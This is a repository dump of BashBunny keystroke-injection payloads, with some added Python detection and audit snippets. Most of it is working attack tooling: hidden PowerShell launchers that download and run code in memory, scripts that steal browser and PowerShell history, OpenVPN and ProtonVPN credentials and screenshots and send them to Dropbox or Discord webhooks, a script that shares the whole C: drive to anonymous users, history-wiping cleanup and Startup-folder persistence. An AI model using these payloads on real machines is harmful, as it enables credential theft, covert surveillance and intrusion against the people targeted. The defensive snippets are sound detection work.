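    """True for a POST to a watched upload endpoint from a scripting client."""
    if rec["method"] != "POST":
        return False
    url = urlsplit(rec["url"])
    pattern = UPLOAD_ENDPOINTS.get((url.hostname or "").lower())
    if pattern is None or not pattern.search(url.path):
        return False
    return bool(SCRIPT_AGENT.search(rec["ua"]))


def summarise(lines) -> dict:
    """Aggregate flagged uploads per client: hit count and bytes sent."""
    per_client = defaultdict(lambda: {"hits": 0, "bytes_out": 0})
    for line in lines:
        rec = parse(line)
        if rec and is_scripted_upload(rec):
            per_client[rec["client"]]["hits"] += 1
            per_client[rec["client"]]["bytes_out"] += rec["bytes_out"]
    return dict(per_client)


# Constructed sample log; addresses, tokens and sizes are placeholders.
SAMPLE_LOG = [
    '2024-01-01T10:00:01Z 10.0.0.21 POST https://content.dropboxapi.com/2/files/upload '
    '200 524288 "Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1"',
    '2024-01-01T10:00:05Z 10.0.0.21 POST '
    'https://discord.com/api/webhooks/000000000000000000/CONSTRUCTED-TOKEN '
    '200 1048576 "curl/8.4.0"',
    # Legitimate sync client talking to the same Dropbox endpoint.
    '2024-01-01T10:01:00Z 10.0.0.33 POST https://content.dropboxapi.com/2/files/upload '
    '200 2048 "DropboxDesktopClient/1.0 (constructed)"',
    # Browser session on Discord: not a webhook path, not a POST.
    '2024-01-01T10:02:00Z 10.0.0.40 GET https://discord.com/channels/@me '
    '200 0 "Mozilla/5.0 (Windows NT 10.0; Win64; x64) Chrome/120.0"',
    # PowerShell talking to an unrelated host.
    '2024-01-01T10:03:00Z 10.0.0.50 POST https://intranet.example.invalid/api/report '
    '200 512 "Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1"',
    'malformed line',
]

if __name__ == "__main__":
    for client, stats in summarise(SAMPLE_LOG).items():
        print(client, stats)
```

The User-Agent is set by the client, so this works as a cheap first filter; pairing it with endpoint telemetry for the owning process closes the gap when the header is changed.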

================================================
FILE: BashBunny/payloads/History-Pig/payload.txt
================================================
REM Title: History-Pig
REM Author: atomiczsec
REM Description: This payload is meant to exfiltrate browsers history to a dropbox
REM Target: Windows 10, 11

DELAY 2000
GUI r
DELAY 500
STRING powershell -w h -NoP -NonI -ep Bypass $pl = iwr < Your Shared link for the intended file> dl=1; iex $pl
ENTER

REM Remember to replace the link with your DropBox shared link for the intended file to download
REM Also remember to replace ?dl=0 with ?dl=1 at the end of your link so it is executed properlymode con:cols=14 lines=1

================================================
FILE: BashBunny/payloads/OVPN-Hog/o.ps1
================================================
function OVPN-Hog {

    [CmdletBinding()]
    param (
        [parameter(Position=0,Mandatory=$False)]
        [string]$file,
        [parameter(Position=1,Mandatory=$False)]
        [string]$text
    )

    $hookurl = 'DISCORD-WEBHOOK'

    $Body = @{
        'username' = $env:username
        'content' = $text
    }

    if (-not ([string]::IsNullOrEmpty($text))) {
        Invoke-RestMethod -ContentType 'Application/Json' -Uri $hookurl -Method Post -Body ($Body | ConvertTo-Json)
    }

    if (-not ([string]::IsNullOrEmpty($file))) {
        curl.exe -F "file1=@$file" $hookurl
    }
}

$Drive = "C:"
$Files = Get-ChildItem -Path $Drive -Filter "*.ovpn" -File -Recurse

if ($Files) {
    $types = @{
        "*.ovpn" = "OpenVPN"
    }

    foreach ($type in $types.Keys) {
        $filteredFiles = $Files | Where-Object { $_.Name -like $type }
        if ($filteredFiles) {
            $zipFile = Join-Path -Path $env:TEMP -ChildPath "$($types[$type]).zip"
            $filteredFiles | Compress-Archive -DestinationPath $zipFile
            OVPN-Hog -file $zipFile -text "Uploading $($types[$type]) files"
        }
    }
}

================================================
FILE: BashBunny/payloads/OVPN-Hog/payload.txt
================================================
REM Title: Doc-Hog
REM Author: atomiczsec
REM Description: This payload will enumerate through the files looking for ".ovpn" files. Then create ZIPs with them, then send to a discord webhook.
REM Target: Windows 10

QUACK DELAY 2000
QUACK GUI r
QUACK DELAY 500
QUACK STRING powershell -w h -NoP -NonI -ep Bypass $pl = iwr < URL HERE > dl=1; iex $pl
QUACK ENTER

REM Remember to replace the link with your DropBox shared link for the intended file to download
REM Also remember to replace ?dl=0 with ?dl=1 at the end of your link so it is executed properlymode con:cols=14 lines=1

================================================
FILE: BashBunny/payloads/OVPN-Hog/readme.md
================================================

Table of Contents
  1. Description
  2. Getting Started
  3. Contributing
  4. Version History
  5. Contact
  6. Acknowledgments
# OVPN-Hog

A PowerShell script to search for and exfiltrate OpenVPN configuration files (.ovpn).

## Description

This script searches the entire C: drive of a Windows 10 or 11 machine for OpenVPN configuration files with the .ovpn extension. It then creates a zip archive containing the discovered files and uploads it to a Discord webhook.

## Getting Started

### Dependencies

* DropBox or other file sharing service - Your Shared link for the intended file
* Windows 10, 11

### Executing program

* Plug in your device
* Invoke-WebRequest will be entered in the Run Box to download and execute the script from memory

```
powershell -w h -NoP -NonI -ep Bypass $pl = iwr < Your Shared link for the intended file> ?dl=1; iex $pl
```

## Contributing

All contributors' names will be listed here

atomiczsec

I am Jakoby

## Version History

* 0.1
    * Initial Release

## Contact

## Acknowledgments

* [Hak5](https://hak5.org/)
* [I-Am-Jakoby](https://github.com/I-Am-Jakoby)

================================================
FILE: BashBunny/payloads/Powershell-History/PH.ps1
================================================
#Powershell-History

# See if file is a thing
Test-Path -Path "$env:APPDATA\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt" -PathType Leaf

#If the file does not exist, write to host.
if (-not(Test-Path -Path "$env:APPDATA\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt" -PathType Leaf)) {
    try {
        Write-Host "The Powershell History file has not been found. "
    }
    catch {
        throw $_.Exception.Message
    }
}
# Copy Powershell History to Temp Directory to get sent to Dropbox
else {
    $F1 = "$env:USERNAME-$(get-date -f yyyy-MM-dd_hh-mm)_ps_history.txt"
    Copy-Item "$env:APPDATA\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt" -Destination "$env:tmp/$F1"
}

function DropBox-Upload {

    [CmdletBinding()]
    param (
        [Parameter (Mandatory = $True, ValueFromPipeline = $True)]
        [Alias("f")]
        [string]$SourceFilePath
    )
    $DropBoxAccessToken = "YOUR-DROPBOX-ACCESS-TOKEN" # Replace with your DropBox Access Token
    $outputFile = Split-Path $SourceFilePath -leaf
    $TargetFilePath="/$outputFile"
    $arg = '{ "path": "' + $TargetFilePath + '", "mode": "add", "autorename": true, "mute": false }'
    $authorization = "Bearer " + $DropBoxAccessToken
    $headers = New-Object "System.Collections.Generic.Dictionary[[String],[String]]"
    $headers.Add("Authorization", $authorization)
    $headers.Add("Dropbox-API-Arg", $arg)
    $headers.Add("Content-Type", 'application/octet-stream')
    Invoke-RestMethod -Uri https://content.dropboxapi.com/2/files/upload -Method Post -InFile $SourceFilePath -Headers $headers
}

DropBox-Upload -f "$env:tmp/$F1"

$done = New-Object -ComObject Wscript.Shell;$done.Popup("Driver Updated",1)

================================================
FILE: BashBunny/payloads/Powershell-History/README.md
================================================

Table of Contents
  1. Description
  2. Getting Started
  3. Contributing
  4. Version History
  5. Contact
  6. Acknowledgments
# Powershell-History A payload to exfiltrate the history of the powershell console ## Description This payload will enumerate through the powershell directories, looking for the file that stores the history of the powershell console These files will be saved to the temp directory Finally dropbox will be used to exfiltrate the files to cloud storage ## Getting Started ### Dependencies * DropBox or other file sharing service - Your Shared link for the intended file * Windows 10

(back to top)

### Executing program * Plug in your device * Invoke-WebRequest will be entered in the Run Box to download and execute the script from memory ``` powershell -w h -NoP -NonI -ep Bypass $pl = iwr < Your Shared link for the intended file> ?dl=1; iex $pl ```

## Contributing

All contributors' names will be listed here:

* atomiczsec
* I am Jakoby

## Version History

* 0.1
    * Initial Release

## Contact

📱 My Socials 📱

* YouTube
* Twitter
* I-Am-Jakoby's Discord

## Acknowledgments

* [Hak5](https://hak5.org/)
* [I-Am-Jakoby](https://github.com/I-Am-Jakoby)
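
The Run Box launcher under "Executing program" (hidden window, no profile, non-interactive, execution-policy bypass, then `iwr` feeding `iex`) recurs in most payloads in this repository, and Screen-Shock uses a variant that writes into the Startup folder instead. The following is an added detection example, not code from this repository: a Python triage function that scores process-creation command lines for that pattern. The event field names, host names and `example.test` URLs are constructed for illustration.

```python
import ntpath
import re


def _prefixes(full, minimum):
    """Regex alternation of every prefix of `full` at least `minimum` chars long."""
    return "|".join(re.escape(full[:n]) for n in range(len(full), minimum - 1, -1))


def _flag(names, value=None):
    """Pattern for a whitespace-delimited -Flag token, optionally followed by a value."""
    body = r"(?<!\S)-(?:%s)" % names
    if value is not None:
        body += r"\s+(?:%s)" % value
    return re.compile(body + r"(?!\S)", re.IGNORECASE)


# powershell.exe accepts abbreviated parameter names, so "-w h" and
# "-WindowStyle Hidden" must both match. Each pattern covers the short form
# used on this page up to the full parameter name.
INDICATORS = {
    "hidden_window": _flag(_prefixes("windowstyle", 1), _prefixes("hidden", 1)),
    "no_profile": _flag(_prefixes("noprofile", 3)),
    "non_interactive": _flag(_prefixes("noninteractive", 4)),
    "policy_bypass": _flag(_prefixes("executionpolicy", 2) + "|ep", "bypass"),
    "web_download": re.compile(r"\b(?:iwr|invoke-webrequest)\b", re.IGNORECASE),
    "in_memory_exec": re.compile(r"\b(?:iex|invoke-expression)\b", re.IGNORECASE),
    "startup_write": re.compile(r"\\Start Menu\\Programs\\Startup\\", re.IGNORECASE),
}
STEALTH_FLAGS = ("hidden_window", "no_profile", "non_interactive", "policy_bypass")


def analyze(command_line):
    """Return the indicators present in one command line and a severity."""
    hits = [name for name, rx in INDICATORS.items() if rx.search(command_line)]
    stealth = sum(1 for h in hits if h in STEALTH_FLAGS)
    if "web_download" in hits and ("in_memory_exec" in hits or "startup_write" in hits):
        severity = "high"      # download followed by execution or persistence
    elif stealth >= 3:
        severity = "medium"    # launcher flags alone: common in admin tooling too
    elif hits:
        severity = "low"
    else:
        severity = None
    return {"indicators": hits, "severity": severity}


def triage(events, report=("high", "medium")):
    """Score PowerShell process-creation events and keep the reportable ones."""
    findings = []
    for ev in events:
        if ntpath.basename(ev["image"]).lower() not in ("powershell.exe", "pwsh.exe"):
            continue
        result = analyze(ev["command_line"])
        if result["severity"] in report:
            findings.append({
                "host": ev["host"],
                "severity": result["severity"],
                "indicators": result["indicators"],
                # Run Box launches are children of explorer.exe; this is
                # consistent with keystroke injection, not proof of it.
                "run_box_like": ntpath.basename(ev["parent"]).lower() == "explorer.exe",
            })
    return findings


PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"

# Constructed sample events (not real telemetry).
SAMPLE_EVENTS = [
    {"host": "WS-01", "parent": r"C:\Windows\explorer.exe", "image": PS,
     "command_line": r"powershell -w h -NoP -NonI -ep Bypass $pl = iwr "
                     r"https://files.example.test/PLACEHOLDER?dl=1; iex $pl"},
    {"host": "WS-02", "parent": r"C:\Windows\explorer.exe", "image": PS,
     "command_line": r'powershell -w h -NoP -NonI -Ep Bypass "echo (iwr '
                     r'paste.example.test/raw/PLACEHOLDER).content > $env:APPDATA'
                     r'\Microsoft\Windows\Start Menu\Programs\Startup\l.bat"'},
    {"host": "SRV-03", "parent": r"C:\Windows\System32\svchost.exe", "image": PS,
     "command_line": r"powershell.exe -NoProfile -ExecutionPolicy RemoteSigned "
                     r"-File C:\Scripts\backup.ps1"},
    {"host": "SRV-09", "parent": r"C:\Program Files\Mgmt\agent.exe", "image": PS,
     "command_line": r"powershell.exe -WindowStyle Hidden -NoProfile -NonInteractive "
                     r"-ExecutionPolicy Bypass -File C:\Tools\inventory.ps1"},
]

if __name__ == "__main__":
    for finding in triage(SAMPLE_EVENTS):
        print(finding)
```

The stealth flags on their own only reach "medium" because legitimate management tooling uses them as well; the download paired with in-memory execution or a Startup-folder write is what raises an event to "high".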


================================================ FILE: BashBunny/payloads/Powershell-History/payload.txt ================================================ REM Title: Powershell-History REM Author: atomiczsec REM Description: This payload is meant to exfiltrate powershells history to a dropbox, powershell is commonly used for IT automation REM Target: Windows 10 DELAY 2000 GUI r DELAY 500 STRING powershell -w h -NoP -NonI -ep Bypass $pl = iwr < Your Shared link for the intended file> dl=1; iex $pl ENTER REM Remember to replace the link with your DropBox shared link for the intended file to download REM Also remember to replace ?dl=0 with ?dl=1 at the end of your link so it is executed properlymode con:cols=14 lines=1 ================================================ FILE: BashBunny/payloads/Printer-Recon/PR.ps1 ================================================ function DropBox-Upload { [CmdletBinding()] param ( [Parameter (Mandatory = $True, ValueFromPipeline = $True)] [Alias("f")] [string]$SourceFilePath ) $DropBoxAccessToken = "YOUR-DROPBOX-TOKEN" # Replace with your DropBox Access Token $outputFile = Split-Path $SourceFilePath -leaf $TargetFilePath="/$outputFile" $arg = '{ "path": "' + $TargetFilePath + '", "mode": "add", "autorename": true, "mute": false }' $authorization = "Bearer " + $DropBoxAccessToken $headers = New-Object "System.Collections.Generic.Dictionary[[String],[String]]" $headers.Add("Authorization", $authorization) $headers.Add("Dropbox-API-Arg", $arg) $headers.Add("Content-Type", 'application/octet-stream') Invoke-RestMethod -Uri https://content.dropboxapi.com/2/files/upload -Method Post -InFile $SourceFilePath -Headers $headers } function Clean-Exfil { # empty temp folder rm $env:TEMP\* -r -Force -ErrorAction SilentlyContinue # delete run box history reg delete HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU /va /f # Delete powershell history Remove-Item (Get-PSreadlineOption).HistorySavePath # Empty recycle bin 
Clear-RecycleBin -Force -ErrorAction SilentlyContinue } $F1 = "$env:tmp/$env:USERNAME-$(get-date -f yyyy-MM-dd_hh-mm)_PrinterDriver.txt" Get-Printer | Select-Object Name, Type, DriverName, Shared, Location > $F1 DropBox-Upload -f $F1 Clean-Exfil ================================================ FILE: BashBunny/payloads/Printer-Recon/README.md ================================================

Table of Contents
  1. Description
  2. Getting Started
  3. Contributing
  4. Version History
  5. Contact
  6. Acknowledgments
# Printer-Recon

## Description

This payload is meant to exfiltrate printer information for further social engineering or driver exploitation. It can also be used to find printer web interfaces on the network.

## Getting Started

### Dependencies

* DropBox or other file sharing service - Your Shared link for the intended file
* Windows 10

### Executing program

* Plug in your device
* Invoke-WebRequest will be entered in the Run Box to download and execute the script from memory

```
powershell -w h -NoP -NonI -ep Bypass $pl = iwr < Your Shared link for the intended file> ?dl=1; iex $pl
```

## Contributing

All contributors' names will be listed here:

* atomiczsec
* I am Jakoby

## Version History

* 0.1
    * Initial Release

## Contact

📱 My Socials 📱

* YouTube
* Twitter
* I-Am-Jakoby's Discord

## Acknowledgments

* [Hak5](https://hak5.org/)
* [I-Am-Jakoby](https://github.com/I-Am-Jakoby)

================================================ FILE: BashBunny/payloads/Printer-Recon/payload.txt ================================================ REM Title: Printer-Recon REM Author: atomiczsec REM Description: This payload is meant to exfiltrate printer information for further social engineering or driver explotation. Can also be used to find printer web interfaces on the network REM Target: Windows 10 DELAY 2000 GUI r DELAY 500 STRING powershell -w h -NoP -NonI -ep Bypass $pl = iwr < Your Shared link for the intended file> dl=1; iex $pl ENTER REM Remember to replace the link with your DropBox shared link for the intended file to download REM Also remember to replace ?dl=0 with ?dl=1 at the end of your link so it is executed properlymode con:cols=14 lines=1 ================================================ FILE: BashBunny/payloads/Priv-Paths/README.md ================================================

Table of Contents
  1. Description
  2. Getting Started
  3. Contributing
  4. Version History
  5. Contact
  6. Acknowledgments
# Printer-Recon

## Description

A payload to enumerate unquoted service paths for privilege escalation and send them to a Discord webhook.

## Getting Started

### Dependencies

* Discord Webhook or other service that uses webhooks
* Windows 10

### Executing program

* Plug in your device
* Command will be entered in the command prompt to search for unquoted service paths so you can later exploit them for priv esc

```
wmic service get name, displayname, pathname, startmode | findstr /i "Auto" | findstr /i /v "C:\Windows\\" | findstr /i /v ^"^"^" > p.txt
```

## Contributing

All contributors' names will be listed here:

* atomiczsec

## Version History

* 0.1
    * Initial Release

## Contact

📱 My Socials 📱

* YouTube
* Twitter
* I-Am-Jakoby's Discord

## Acknowledgments

* [Hak5](https://hak5.org/)
* [I-Am-Jakoby](https://github.com/I-Am-Jakoby)
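
The `wmic`/`findstr` chain above lists every auto-start service whose path contains no quote and is not under `C:\Windows\`, whether or not the path actually contains a space. The following is an added hardening example, not code from this repository: a Python audit that flags only service paths that are both unquoted and contain a space in the executable portion, covers all start modes, and emits the quoted value to set as the fix. The service records are constructed sample data, and `page_filter_lists` only approximates the page's filter.

```python
import re

# Executable portion of an unquoted PathName: everything up to the first
# ".exe" that is followed by whitespace or end of string.
_EXE_SPLIT = re.compile(r"^(.*?\.exe)(?=\s|$)(.*)$", re.IGNORECASE)


def split_image_path(pathname):
    """Split a service PathName into (executable, arguments, was_quoted)."""
    pathname = pathname.strip()
    if pathname.startswith('"'):
        end = pathname.find('"', 1)
        if end != -1:
            return pathname[1:end], pathname[end + 1:].strip(), True
    match = _EXE_SPLIT.match(pathname)
    if match:
        return match.group(1), match.group(2).strip(), False
    return pathname, "", False


def page_filter_lists(svc):
    """Approximate the page's findstr chain: Auto start, not under the
    Windows directory, and no double quote anywhere in the path."""
    path = svc["pathname"]
    return (svc["startmode"].lower() == "auto"
            and "c:\\windows\\" not in path.lower()
            and '"' not in path)


def audit_services(services):
    """Return services whose executable path is unquoted and contains a space.

    Windows can resolve such a path to a different executable than intended,
    so the remediation is to store the executable path in double quotes.
    """
    findings = []
    for svc in services:
        exe, args, quoted = split_image_path(svc["pathname"])
        if quoted or " " not in exe:
            continue
        fixed = '"%s"' % exe + (" " + args if args else "")
        findings.append({
            "name": svc["name"],
            "startmode": svc["startmode"],
            "pathname": svc["pathname"],
            "quoted_pathname": fixed,          # value to set as the fix
            "in_page_filter": page_filter_lists(svc),
        })
    return findings


# Constructed sample records (name, pathname, startmode as wmic reports them).
SAMPLE_SERVICES = [
    {"name": "UpdaterSvc", "startmode": "Auto",
     "pathname": r"C:\Program Files\Example Vendor\Updater\updater.exe --service"},
    {"name": "AgentSvc", "startmode": "Auto",
     "pathname": r"C:\Tools\agent.exe -run"},
    {"name": "BackupSvc", "startmode": "Auto",
     "pathname": r'"C:\Program Files\Backup Tool\backup.exe" /svc'},
    {"name": "LegacySvc", "startmode": "Manual",
     "pathname": r"C:\Program Files (x86)\Legacy App\legacy.exe"},
    {"name": "HostSvc", "startmode": "Auto",
     "pathname": r"C:\Windows\system32\svchost.exe -k netsvcs"},
]

if __name__ == "__main__":
    for finding in audit_services(SAMPLE_SERVICES):
        print(finding["name"], "->", finding["quoted_pathname"])
```

`AgentSvc` would appear in the page's `p.txt` even though its path has no space, while `LegacySvc` is flagged here but missed by the page's filter because it is not an auto-start service.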


================================================ FILE: BashBunny/payloads/Priv-Paths/payload.txt ================================================ REM Title: Priv-Paths REM Author: atomiczsec REM Description: A payload to enumerate unqouted service paths for privilege escalation and send to a discord webhook. REM Target: Windows 10 Q DELAY 3000 Q GUI r Q DELAY 1000 Q STRING cmd Q ENTER Q DELAY 500 Q STRING cd %HOMEPATH% Q ENTER Q DELAY 1000 Q STRING wmic service get name, displayname, pathname, startmode | findstr /i "Auto" | findstr /i /v "C:\Windows\\" | findstr /i /v ^"^"^" > p.txt Q ENTER Q DELAY 1000 Q STRING curl.exe -F "payload_json={\"username\": \"p\", \"content\": \"**Paths**\"}" -F "file=@p.txt" YOUR-DISCORD-WEBHOOK Q ENTER Q DELAY 200 Q STRING del p.txt Q ENTER Q DELAY 100 Q STRING exit Q ENTER ================================================ FILE: BashBunny/payloads/Proton-Hog/README.md ================================================

Table of Contents
  1. Description
  2. Getting Started
  3. Contributing
  4. Version History
  5. Contact
  6. Acknowledgments
# Proton-Hog

A payload to exfiltrate the user config file of Proton VPN that contains keys and usernames as well as account information.

## Description

This payload will enumerate through the ProtonVPN directories, looking for the file that stores the user config. Then Dropbox will be used to exfiltrate the files to cloud storage.

## Getting Started

### Dependencies

* DropBox or other file sharing service - Your Shared link for the intended file
* Windows 10, 11

### Executing program

* Plug in your device
* Invoke-WebRequest will be entered in the Run Box to download and execute the script from memory

```
powershell -w h -NoP -NonI -ep Bypass $pl = iwr < Your Shared link for the intended file> ?dl=1; iex $pl
```

## Contributing

All contributors' names will be listed here:

* atomiczsec
* I am Jakoby

## Version History

* 0.1
    * Initial Release

## Contact

📱 My Socials 📱

* YouTube
* Twitter
* I-Am-Jakoby's Discord

## Acknowledgments

* [Hak5](https://hak5.org/)
* [I-Am-Jakoby](https://github.com/I-Am-Jakoby)

================================================ FILE: BashBunny/payloads/Proton-Hog/payload.txt ================================================ REM Title: Proton-Hog REM Author: atomiczsec REM Description: A payload to exfiltrate the user config file of Proton VPN that contains keys and usernames as well as acount information. REM Target: Windows 10 DELAY 2000 GUI r DELAY 500 STRING powershell -w h -NoP -NonI -ep Bypass $pl = iwr < Your Shared link for the intended file> dl=1; iex $pl ENTER REM Remember to replace the link with your DropBox shared link for the intended file to download REM Also remember to replace ?dl=0 with ?dl=1 at the end of your link so it is executed properlymode con:cols=14 lines=1 ================================================ FILE: BashBunny/payloads/Proton-Hog/s.ps1 ================================================ function DropBox-Upload { [CmdletBinding()] param ( [Parameter (Mandatory = $True, ValueFromPipeline = $True)] [Alias("f")] [string]$SourceFilePath ) $DropBoxAccessToken = "YOUR-DROPBOX-TOKEN" # Replace with your DropBox Access Token $outputFile = Split-Path $SourceFilePath -leaf $TargetFilePath="/$outputFile" $arg = '{ "path": "' + $TargetFilePath + '", "mode": "add", "autorename": true, "mute": false }' $authorization = "Bearer " + $DropBoxAccessToken $headers = New-Object "System.Collections.Generic.Dictionary[[String],[String]]" $headers.Add("Authorization", $authorization) $headers.Add("Dropbox-API-Arg", $arg) $headers.Add("Content-Type", 'application/octet-stream') Invoke-RestMethod -Uri https://content.dropboxapi.com/2/files/upload -Method Post -InFile $SourceFilePath -Headers $headers } # Test the path to the ProtonVPN directory and if it is availible, change directory to where the user.config is stored if (-not(Test-Path "$env:USERPROFILE\AppData\Local\ProtonVPN")) { try { Write-Host "The VPN folder has not been found. 
" } catch { throw $_.Exception.Message } } else { $protonVpnPath = "$env:USERPROFILE\AppData\Local\ProtonVPN" cd $protonVpnPath Get-ChildItem | Where-Object {$_.name -Match "ProtonVPN.exe"} | cd Get-ChildItem | cd # Upload user.config to dropbox DropBox-Upload -f "user.config" } ================================================ FILE: BashBunny/payloads/Pwn-Drive/README.md ================================================

Table of Contents
  1. Description
  2. Getting Started
  3. Contributing
  4. Version History
  5. Contact
  6. Acknowledgments
# Pwn-Drive

A payload to share the victim's "C:" drive to the network.

## Description

This payload will share the victim's entire "C:" drive to the entire network for further exploitation.

## Getting Started

### Dependencies

* DropBox or other file sharing service - Your Shared link for the intended file
* Windows 10

### Executing program

* Plug in your device
* Invoke-WebRequest will be entered in the Run Box to download and execute the script from memory

```
powershell -w h -NoP -NonI -ep Bypass $pl = iwr < Your Shared link for the intended file> ?dl=1; iex $pl
```

## Contributing

All contributors' names will be listed here:

* atomiczsec
* I am Jakoby

## Version History

* 0.1
    * Initial Release

## Contact

📱 My Socials 📱

* YouTube
* Twitter
* I-Am-Jakoby's Discord

## Acknowledgments

* [Hak5](https://hak5.org/)
* [I-Am-Jakoby](https://github.com/I-Am-Jakoby)

================================================ FILE: BashBunny/payloads/Pwn-Drive/c.ps1 ================================================ #Pwn-Drive #Enable Network Discovery netsh advfirewall firewall set rule group=”network discovery” new enable=yes #Enable File and Print netsh firewall set service type=fileandprint mode=enable profile=all #Setting Registry Values for allowing access to drive without credentials Set-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Control\Lsa" -Name everyoneincludesanonymous -Value 1 -Force Set-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Services\LanManServer\Parameters\" -Name restrictnullsessacces -Value 0 -Force #Sharing the Drive New-SmbShare -Name "Windows Update" -Path "C:\" ================================================ FILE: BashBunny/payloads/Pwn-Drive/payload.txt ================================================ REM Title: Pwn-Drive REM Author: atomiczsec REM Description: This payload will share the entire victims "C:" drive to the entire network for further exploitation. REM Target: Windows 10 DELAY 2000 GUI r DELAY 500 STRING powershell -w h -NoP -NonI -ep Bypass $pl = iwr < Your Shared link for the intended file> dl=1; iex $pl ENTER REM Remember to replace the link with your DropBox shared link for the intended file to download REM Also remember to replace ?dl=0 with ?dl=1 at the end of your link so it is executed properlymode con:cols=14 lines=1 ================================================ FILE: BashBunny/payloads/RanFunWare/README.md ================================================

Table of Contents
  1. Description
  2. Getting Started
  3. Contributing
  4. Version History
  5. Contact
  6. Acknowledgments
# RanFunWare

A payload to prank your friends into thinking their computer got hit with ransomware.

## Description

This payload will hide all desktop icons, change the background, and have a message pop up (Fully Customizable)

## Getting Started

### Dependencies

* DropBox or other file sharing service - Your Shared link for the intended file
* Windows 10

### Executing program

* Plug in your device
* Invoke-WebRequest will be entered in the Run Box to download and execute the script from memory

```
powershell -w h -NoP -NonI -ep Bypass $pl = iwr < Your Shared link for the intended file> ?dl=1; iex $pl
```

## Contributing

All contributors' names will be listed here:

* atomiczsec
* I am Jakoby

## Version History

* 0.1
    * Initial Release

## Contact

📱 My Socials 📱

* YouTube
* Twitter
* I-Am-Jakoby's Discord

## Acknowledgments

* [Hak5](https://hak5.org/)
* [I-Am-Jakoby](https://github.com/I-Am-Jakoby)

================================================ FILE: BashBunny/payloads/RanFunWare/payload.txt ================================================ REM Title: RanFunWare REM Author: atomiczsec REM Description: This payload will prank your target into thinking their machine got hit with ransomware. REM Target: Windows 10 DELAY 2000 GUI r DELAY 500 STRING powershell -w h -NoP -NonI -ep Bypass $pl = iwr < Your Shared link for the intended file> dl=1; iex $pl ENTER REM Remember to replace the link with your DropBox shared link for the intended file to download REM Also remember to replace ?dl=0 with ?dl=1 at the end of your link so it is executed properlymode con:cols=14 lines=1 ================================================ FILE: BashBunny/payloads/RanFunWare/r.ps1 ================================================ #Hides Desktop Icons $Path="HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" Set-ItemProperty -Path $Path -Name "HideIcons" -Value 1 Get-Process "explorer"| Stop-Process #Changes Background #URL For the Image of your choice (Wanna Cry Ransomware Background) $url = "https://c4.wallpaperflare.com/wallpaper/553/61/171/5k-black-hd-mockup-wallpaper-preview.jpg" Invoke-WebRequest $url -OutFile C:\temp\test.jpg $setwallpapersrc = @" using System.Runtime.InteropServices; public class Wallpaper { public const int SetDesktopWallpaper = 20; public const int UpdateIniFile = 0x01; public const int SendWinIniChange = 0x02; [DllImport("user32.dll", SetLastError = true, CharSet = CharSet.Auto)] private static extern int SystemParametersInfo(int uAction, int uParam, string lpvParam, int fuWinIni); public static void SetWallpaper(string path) { SystemParametersInfo(SetDesktopWallpaper, 0, path, UpdateIniFile | SendWinIniChange); } } "@ Add-Type -TypeDefinition $setwallpapersrc [Wallpaper]::SetWallpaper("C:\temp\test.jpg") #Pop Up Message function MsgBox { [CmdletBinding()] param ( [Parameter (Mandatory = $True)] [Alias("m")] [string]$message, [Parameter 
(Mandatory = $False)] [Alias("t")] [string]$title, [Parameter (Mandatory = $False)] [Alias("b")] [ValidateSet('OK','OKCancel','YesNoCancel','YesNo')] [string]$button, [Parameter (Mandatory = $False)] [Alias("i")] [ValidateSet('None','Hand','Question','Warning','Asterisk')] [string]$image ) Add-Type -AssemblyName PresentationCore,PresentationFramework if (!$title) {$title = " "} if (!$button) {$button = "OK"} if (!$image) {$image = "None"} [System.Windows.MessageBox]::Show($message,$title,$button,$image) } MsgBox -m 'Your Computer Has Been Infected' -t "Warning" -b OKCancel -i Warning ================================================ FILE: BashBunny/payloads/Screen-Shock/I.bat ================================================ @echo off powershell -Command "& {cd "$env:userprofile\AppData\Roaming"; powershell -w h -NoP -NonI -Ep Bypass -File "c.ps1"}" pause ================================================ FILE: BashBunny/payloads/Screen-Shock/README.md ================================================

Table of Contents
  1. Description
  2. Getting Started
  3. Contributing
  4. Version History
  5. Contact
  6. Acknowledgments
# Screen-Shock

This payload is meant to exfiltrate screenshots of all monitors and send them to a Dropbox every 15 seconds. (This setting can be changed in the c.ps1 file)

## Description

This payload uses iwr to download 2 files:

* I.bat
* c.ps1

**I.bat** is downloaded to the startup folder to maintain persistence and execute c.ps1 on reboot/startup.

**c.ps1** will sit in the AppData\Roaming folder, taking a screenshot of all monitors every 15 seconds.

The contents will then be sent to the DropBox for viewing pleasure.

## Getting Started

### Dependencies

* Pastebin or other file sharing service, Dropbox
* Windows 10
* [Here](https://github.com/I-Am-Jakoby/PowerShell-for-Hackers/blob/main/Functions/DropBox-Upload.md) is a tutorial on how to use DropBox-Upload

### Executing program

* Plug in your device
* Device will download both files and place them in proper directories to then run the script

```
powershell -w h -NoP -NonI -Ep Bypass "echo (iwr PASTEBIN LINK FOR BAT).content > "$env:APPDATA\Microsoft\Windows\Start Menu\Programs\Startup\l.bat";echo (iwr PASTEBIN LINK FOR PS1).content > "$env:APPDATA\c.ps1";powershell "$env:APPDATA\c.ps1""
```

## Contributing

All contributors' names will be listed here:

* [atomiczsec](https://github.com/atomiczsec)

## Version History

* 0.1
    * Initial Release

## Contact

📱 My Socials 📱

* YouTube
* Twitter
* I-Am-Jakoby's Discord

## Acknowledgments

* [Hak5](https://hak5.org/)
* [I-Am-Jakoby](https://github.com/I-Am-Jakoby)

